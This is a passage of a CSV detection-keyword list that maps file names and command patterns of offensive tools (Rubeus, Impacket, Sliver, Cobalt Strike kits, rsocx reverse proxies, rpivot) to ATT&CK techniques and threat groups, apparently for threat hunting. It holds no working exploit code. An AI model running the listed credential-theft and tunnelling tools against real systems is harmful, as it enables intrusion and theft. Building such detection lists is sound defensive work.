- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcdump.py * | grep MS-RPRN*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*rpcrt4_new.dll*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" +"*rpcrt4_old.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" +"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpivot.zip*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*rpivot-master*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*rpm.torproject.org/*public_gpg.key*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rsactftool --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rsactftool* --dumpkey --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rshijack*","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","402","41","2023-06-03T16:37:11Z","2018-02-23T02:21:45Z" +"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*rsocx -l 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsocx -r *:*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsocx -t 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsocx.exe* 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsocx.exe* 127.0.0.1*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsocx-main.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*rsync -r * *@*:*","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*rsync -r *@*:* *","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*RtlDallas/KrakenMask*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*rubeus.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusAskTgtMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusASREPRoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusChangePwManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusCreateNetOnlyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusDescribeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusDumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusHarvestManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusHarvestMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusHashManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RubeusKerberoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 